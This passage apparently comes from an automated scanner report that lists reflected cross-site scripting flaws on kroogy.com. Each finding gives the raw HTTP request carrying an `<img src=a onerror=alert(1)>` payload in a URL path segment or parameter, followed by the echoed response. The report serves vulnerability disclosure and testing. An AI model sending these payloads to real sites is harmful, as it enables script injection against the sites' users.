<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index83857<img src=a onerror=alert(1)>5428059cf9bController</strong>
...[SNIP]...

6.177. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=si&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c18b9<img%20src%3da%20onerror%3dalert(1)>e9c49ce397c was submitted in the REST URL parameter 2. This input was echoed as c18b9<img src=a onerror=alert(1)>e9c49ce397c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearchc18b9<img%20src%3da%20onerror%3dalert(1)>e9c49ce397c&q=si&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearchc18b9<img src=a onerror=alert(1)>e9c49ce397c</strong>
...[SNIP]...

6.178. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=sit&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44c9f<img%20src%3da%20onerror%3dalert(1)>230c1568b68 was submitted in the REST URL parameter 1. This input was echoed as 44c9f<img src=a onerror=alert(1)>230c1568b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index44c9f<img%20src%3da%20onerror%3dalert(1)>230c1568b68/livesearch&q=sit&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index44c9f<img src=a onerror=alert(1)>230c1568b68Controller</strong>
...[SNIP]...

6.179. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=sit&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a288e<img%20src%3da%20onerror%3dalert(1)>085eb934534 was submitted in the REST URL parameter 2. This input was echoed as a288e<img src=a onerror=alert(1)>085eb934534 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearcha288e<img%20src%3da%20onerror%3dalert(1)>085eb934534&q=sit&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearcha288e<img src=a onerror=alert(1)>085eb934534</strong>
...[SNIP]...

6.180. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8181<img%20src%3da%20onerror%3dalert(1)>1e804ed95f7 was submitted in the REST URL parameter 1. This input was echoed as e8181<img src=a onerror=alert(1)>1e804ed95f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /indexe8181<img%20src%3da%20onerror%3dalert(1)>1e804ed95f7/livesearch&q=site&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Indexe8181<img src=a onerror=alert(1)>1e804ed95f7Controller</strong>
...[SNIP]...

6.181. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bfbe<img%20src%3da%20onerror%3dalert(1)>6d8fdcd1241 was submitted in the REST URL parameter 2. This input was echoed as 2bfbe<img src=a onerror=alert(1)>6d8fdcd1241 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch2bfbe<img%20src%3da%20onerror%3dalert(1)>6d8fdcd1241&q=site&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch2bfbe<img src=a onerror=alert(1)>6d8fdcd1241</strong>
...[SNIP]...

6.182. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site:&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11056<img%20src%3da%20onerror%3dalert(1)>15604bb1f75 was submitted in the REST URL parameter 1. This input was echoed as 11056<img src=a onerror=alert(1)>15604bb1f75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index11056<img%20src%3da%20onerror%3dalert(1)>15604bb1f75/livesearch&q=site:&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index11056<img src=a onerror=alert(1)>15604bb1f75Controller</strong>
...[SNIP]...

6.183. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site:&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5be1c<img%20src%3da%20onerror%3dalert(1)>192451da902 was submitted in the REST URL parameter 2. This input was echoed as 5be1c<img src=a onerror=alert(1)>192451da902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch5be1c<img%20src%3da%20onerror%3dalert(1)>192451da902&q=site:&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch5be1c<img src=a onerror=alert(1)>192451da902</strong>
...[SNIP]...

6.184. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90_random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38cc5<img%20src%3da%20onerror%3dalert(1)>2e38d3282c6 was submitted in the REST URL parameter 1. This input was echoed as 38cc5<img src=a onerror=alert(1)>2e38d3282c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub38cc5<img%20src%3da%20onerror%3dalert(1)>2e38d3282c6/banner_728_90_random.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub38cc5<img src=a onerror=alert(1)>2e38d3282c6Controller</strong>
...[SNIP]...

6.185. http://kroogy.com/search/emailafriend [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/emailafriend

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e99b4<img%20src%3da%20onerror%3dalert(1)>8b9ef66b48e was submitted in the REST URL parameter 1. This input was echoed as e99b4<img src=a onerror=alert(1)>8b9ef66b48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searche99b4<img%20src%3da%20onerror%3dalert(1)>8b9ef66b48e/emailafriend?url=http%3A%2F%2Fkroogy.com HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searche99b4<img src=a onerror=alert(1)>8b9ef66b48eController</strong>
...[SNIP]...

6.186. http://kroogy.com/search/emailafriend [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/emailafriend

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 582a0<img%20src%3da%20onerror%3dalert(1)>686409d57c8 was submitted in the REST URL parameter 2. This input was echoed as 582a0<img src=a onerror=alert(1)>686409d57c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/emailafriend582a0<img%20src%3da%20onerror%3dalert(1)>686409d57c8?url=http%3A%2F%2Fkroogy.com HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:42:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>emailafriend582a0<img src=a onerror=alert(1)>686409d57c8</strong>
...[SNIP]...

6.187. http://kroogy.com/search/images/blank.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/images/blank.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d06fa<img%20src%3da%20onerror%3dalert(1)>81d5887b4c4 was submitted in the REST URL parameter 2. This input was echoed as d06fa<img src=a onerror=alert(1)>81d5887b4c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/imagesd06fa<img%20src%3da%20onerror%3dalert(1)>81d5887b4c4/blank.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>imagesd06fa<img src=a onerror=alert(1)>81d5887b4c4</strong>
...[SNIP]...

6.188. http://kroogy.com/search/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/index.php

Issue detail

The value of the page request parameter is copied into the HTML document as plain text between tags. The payload 8db35<img%20src%3da%20onerror%3dalert(1)>223a12c50e6 was submitted in the page parameter. This input was echoed as 8db35<img src=a onerror=alert(1)>223a12c50e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/index.php?page=search/redir8db35<img%20src%3da%20onerror%3dalert(1)>223a12c50e6&type=news&search=site:xss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:37:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2119

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>redir8db35<img src=a onerror=alert(1)>223a12c50e6</strong>
...[SNIP]...

6.189. http://kroogy.com/search/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/news

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bef17<img%20src%3da%20onerror%3dalert(1)>1a3c051fc03 was submitted in the REST URL parameter 1. This input was echoed as bef17<img src=a onerror=alert(1)>1a3c051fc03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchbef17<img%20src%3da%20onerror%3dalert(1)>1a3c051fc03/news?search=site%3Axss.cx&type=news&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:42:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchbef17<img src=a onerror=alert(1)>1a3c051fc03Controller</strong>
...[SNIP]...

6.190. http://kroogy.com/search/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/news

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d34d<img%20src%3da%20onerror%3dalert(1)>c809307336 was submitted in the REST URL parameter 2. This input was echoed as 4d34d<img src=a onerror=alert(1)>c809307336 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/news4d34d<img%20src%3da%20onerror%3dalert(1)>c809307336?search=site%3Axss.cx&type=news&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:43:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>news4d34d<img src=a onerror=alert(1)>c809307336</strong>
...[SNIP]...

6.191. http://kroogy.com/search/noresults [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/noresults

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b56e<img%20src%3da%20onerror%3dalert(1)>023dea34fef was submitted in the REST URL parameter 1. This input was echoed as 7b56e<img src=a onerror=alert(1)>023dea34fef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search7b56e<img%20src%3da%20onerror%3dalert(1)>023dea34fef/noresults?search=site:xss.cx&type=news HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
